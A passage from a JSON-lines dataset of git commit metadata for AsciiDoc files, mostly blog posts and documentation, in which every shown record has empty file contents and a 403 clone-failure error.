features\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"tck\/index.adoc","new_file":"tck\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba601895fac2e8df042b99146bb088558ff03525","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a83c25a7cd4ecbb91ac905e70928e094713f8697","subject":"y2b create post THE CRAZIEST HEADPHONES EVER","message":"y2b create post THE CRAZIEST HEADPHONES EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-21-THE-CRAZIEST-HEADPHONES-EVER.adoc","new_file":"_posts\/2017-12-21-THE-CRAZIEST-HEADPHONES-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b84c92263fd5da427335e7bcb8b65f564596efbb","subject":"Update 2017-02-06-Improving-percentile-latencies-in-Chronicle-Queue.adoc","message":"Update 2017-02-06-Improving-percentile-latencies-in-Chronicle-Queue.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2017-02-06-Improving-percentile-latencies-in-Chronicle-Queue.adoc","new_file":"_posts\/2017-02-06-Improving-percentile-latencies-in-Chronicle-Queue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63a8ddf996380cc6b00658b0ce9ec35232f4eaaf","subject":"y2b create post Did Apple Just Cancel The iPhone X?","message":"y2b create post Did Apple Just Cancel The iPhone X?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-24-Did%20Apple%20Just%20Cancel%20The%20iPhone%20X%3F.adoc","new_file":"_posts\/2018-01-24-Did%20Apple%20Just%20Cancel%20The%20iPhone%20X%3F.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0c70196833f160ddb7d22838b8db5ee45d17dd7","subject":"Readme updated","message":"Readme updated\n","repos":"Maarc\/windup-as-a-service,Maarc\/windup-as-a-service,Maarc\/windup-as-a-service,Maarc\/windup-as-a-service","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Maarc\/windup-as-a-service.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"654b67e3438f1c898468741625f656ed850f35e6","subject":"Update 2016-10-26-I-did-a-thing.adoc","message":"Update 2016-10-26-I-did-a-thing.adoc","repos":"willyb321\/willyb321.github.io,willyb321\/willyb321.github.io,willyb321\/willyb321.github.io,willyb321\/willyb321.github.io","old_file":"_posts\/2016-10-26-I-did-a-thing.adoc","new_file":"_posts\/2016-10-26-I-did-a-thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willyb321\/willyb321.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0063b66a738537737490b73022f4f474b3aa118c","subject":"1st version of architecture.adoc","message":"1st version of architecture.adoc\n","repos":"emender\/emender-jenkins,emender\/emender-jenkins","old_file":"doc\/architecture.adoc","new_file":"doc\/architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emender\/emender-jenkins.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"44a9d7ac78119545db42d21682c4e310fee46aa2","subject":"Update 2015-07-09-Alpha-version-of-Visjs-Timeline-plugin-for-WordPress.adoc","message":"Update 
2015-07-09-Alpha-version-of-Visjs-Timeline-plugin-for-WordPress.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-09-Alpha-version-of-Visjs-Timeline-plugin-for-WordPress.adoc","new_file":"_posts\/2015-07-09-Alpha-version-of-Visjs-Timeline-plugin-for-WordPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6ce9c0820279b42028dce4ad446cf12951d24af","subject":"formatting for the literal text \"C++\"","message":"formatting for the literal text \"C++\"\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a022e3f8173d0564fa7adce90192338932ce1537","subject":"Update 2016-09-11-Have-fun-with-Cloud-Flare-Slack-Bot.adoc","message":"Update 2016-09-11-Have-fun-with-Cloud-Flare-Slack-Bot.adoc","repos":"locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io","old_file":"_posts\/2016-09-11-Have-fun-with-Cloud-Flare-Slack-Bot.adoc","new_file":"_posts\/2016-09-11-Have-fun-with-Cloud-Flare-Slack-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/locnh\/locnh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6301a59db31f33b38d3a46f0a02c353f93e436b0","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d135d474622e6248f9b5726f249a915928687d70","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"079dfbf6ed84b8f6fbdeeb08b3c4e2b8303c8a24","subject":"update final report","message":"update final report\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-25-final_report.adoc","new_file":"_posts\/2017-08-25-final_report.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb5bdeb6470f058bcd19c3e0d8ef826526615965","subject":"Update 
2019-01-31-till20170307.adoc","message":"Update 2019-01-31-till20170307.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2019-01-31-till20170307.adoc","new_file":"_posts\/2019-01-31-till20170307.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f71c53095e7d84dc1126135bd51efd30ebc55d11","subject":"Change list to danish","message":"Change list to danish\n","repos":"laosdirg\/base,laosdirg\/base,laosdirg\/base","old_file":"docs\/docker.asciidoc","new_file":"docs\/docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laosdirg\/base.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60f0c66cc4940d2d23ca68874c659ef610062d01","subject":"y2b create post $50,000 Racing Simulator -- Thrustmaster T500RS (CES 2013)","message":"y2b create post $50,000 Racing Simulator -- Thrustmaster T500RS (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-12-50000-Racing-Simulator--Thrustmaster-T500RS-CES-2013.adoc","new_file":"_posts\/2013-01-12-50000-Racing-Simulator--Thrustmaster-T500RS-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6854202e8a6ed940165caca4717a26d8c6eed010","subject":"Rmq about web.xml","message":"Rmq about web.xml\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b33601aef3e378e87bbb9fa3c74c26afabf791db","subject":"Create Web-patterns.adoc","message":"Create Web-patterns.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Web-patterns.adoc","new_file":"Web-patterns.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"86f612ae3a6c4a23a22d4b246d83e2da0c288801","subject":"[DOCS] Fixed link to Analyze API","message":"[DOCS] Fixed link to Analyze API\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@e203d839c213052e5e761a533e66c8f45ba2ba25\n","repos":"scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/en\/rest-api\/ml\/jobresource.asciidoc","new_file":"docs\/en\/rest-api\/ml\/jobresource.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa12763eba84f4eb25ec20e65201dd847101a67f","subject":"Docs: Remove invalid configuration options","message":"Docs: Remove invalid configuration options\n\nOriginal commit: elastic\/x-pack-elasticsearch@c1ef6dce5fe721d01b5deacc0934aee3ee1c103b\n","repos":"robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/watcher\/actions\/hipchat.asciidoc","new_file":"docs\/en\/watcher\/actions\/hipchat.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"84133c86fec0145bf4cbdc6acb5664c9f10632e6","subject":"Update SockJS overview section and polish","message":"Update SockJS overview section and 
polish\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/index.adoc","new_file":"src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cd615c4f9da6ec0e4df17629a358bd5f2001b3d","subject":"Document automatic discovery of default TELs","message":"Document automatic discovery of default TELs\n\nThis commit introduces a new \"TestExecutionListener registration and\nordering\" section in the Testing chapter of the reference manual.\n\nIssue: SPR-12082\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/index.adoc","new_file":"src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e5b2d18f0cc4e2d3d3a63aff90abb8ab0334a8f","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47986daae168e80c8295be55a319032590e6b0dc","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdb497a47bc3f1c0fd0c6057c5868e16233b4b72","subject":"y2b create post Google Has Been Recording Your Voice","message":"y2b create post Google Has Been Recording Your Voice","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-03-Google-Has-Been-Recording-Your-Voice.adoc","new_file":"_posts\/2016-06-03-Google-Has-Been-Recording-Your-Voice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3301f9b872ef76440c3f8e7d1387ad0504f9fc63","subject":"Update 
2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","message":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2cc72ce6ab40f6586c15db0963bbc987ab9fc23","subject":"y2b create post Anki DRIVE Unboxing (Feat. Will)","message":"y2b create post Anki DRIVE Unboxing (Feat. Will)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-13-Anki-DRIVE-Unboxing-Feat-Will.adoc","new_file":"_posts\/2014-07-13-Anki-DRIVE-Unboxing-Feat-Will.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddaee0d158d987348509526894144e0835667fa5","subject":"Update 2017-05-12-picture-book.adoc","message":"Update 2017-05-12-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-picture-book.adoc","new_file":"_posts\/2017-05-12-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2092bc9a37174379197044dc761d1bebcef4252e","subject":"Update 2013-12-07-Eclipse-comment-creer-et-utiliser-des-templates-de-code.adoc","message":"Update 2013-12-07-Eclipse-comment-creer-et-utiliser-des-templates-de-code.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-12-07-Eclipse-comment-creer-et-utiliser-des-templates-de-code.adoc","new_file":"_posts\/2013-12-07-Eclipse-comment-creer-et-utiliser-des-templates-de-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02315d149c8160fb007a1387297f7fcf614eac20","subject":"Delete the file at '_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","message":"Delete the file at '_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f56a92e6d203c9e911a665880f84ce72186a139","subject":"Added Windows Google Drive client 
artifacts.","message":"Added Windows Google Drive client artifacts.\n","repos":"pidydx\/artifacts,destijl\/artifacts,destijl\/artifacts,sebastianwelsh\/artifacts,sebastianwelsh\/artifacts,pidydx\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d81380f631fb5e8e1dc646e4e97e72c4b1c62db","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c28079098495f9c58cccaeed732186c2fdbbc349","subject":"Update 2015-06-10-NodeJS-Event-Loop.adoc","message":"Update 2015-06-10-NodeJS-Event-Loop.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-10-NodeJS-Event-Loop.adoc","new_file":"_posts\/2015-06-10-NodeJS-Event-Loop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"106efcb66e2576c8c16dee551c177c247bb34a33","subject":"Update 2016-03-31-Descuidos-fatales.adoc","message":"Update 2016-03-31-Descuidos-fatales.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b98c1356f7f8d86a6422e37b11032c8db5c64a7","subject":"update link to APM Server 6.5 schema definition (#331)","message":"update link to APM Server 6.5 schema definition (#331)\n\n* update link to APM Server 6.5 schema definition\r\n\r\n* update anchor to schema links\r\n\r\nCo-Authored-By: beniwohli <8a85c06c4eba8aba733a4be991bd4b4c6b4e4581@piquadrat.ch>\r\n","repos":"beniwohli\/apm-agent-python,beniwohli\/apm-agent-python,beniwohli\/apm-agent-python,beniwohli\/apm-agent-python","old_file":"docs\/api.asciidoc","new_file":"docs\/api.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beniwohli\/apm-agent-python.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ccb1b205c2718543219c7db10785739c8e6de682","subject":"y2b create post DON'T Buy The iPhone X","message":"y2b create post DON'T Buy The iPhone 
X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-26-DONTBuyTheiPhoneX.adoc","new_file":"_posts\/2017-11-26-DONTBuyTheiPhoneX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efb386af52ad6eb7fd89deaa4c706fde5442369c","subject":"Create neo4j-330-what-you-dont-know.adoc","message":"Create neo4j-330-what-you-dont-know.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/neo4j-330-what-you-dont-know.adoc","new_file":"_posts\/neo4j-330-what-you-dont-know.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17acdf8b50606922d92bbb833a79a4c692ce14af","subject":"y2b create post 128GB iPad Giveaway!","message":"y2b create post 128GB iPad Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-21-128GB-iPad-Giveaway.adoc","new_file":"_posts\/2013-02-21-128GB-iPad-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f75ccb84398fbbdcf87cf8e878d2ee9fb9b6b14","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ba52cd467d4587a595939c7346adeef6a2b6c21","subject":"y2b create post 5 Cool Gadgets Under $10","message":"y2b create post 5 Cool Gadgets Under $10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-21-5CoolGadgetsUnder10.adoc","new_file":"_posts\/2018-01-21-5CoolGadgetsUnder10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5bf1dfeba1d46ba0bb0d0f81fb51d7295367669","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL 
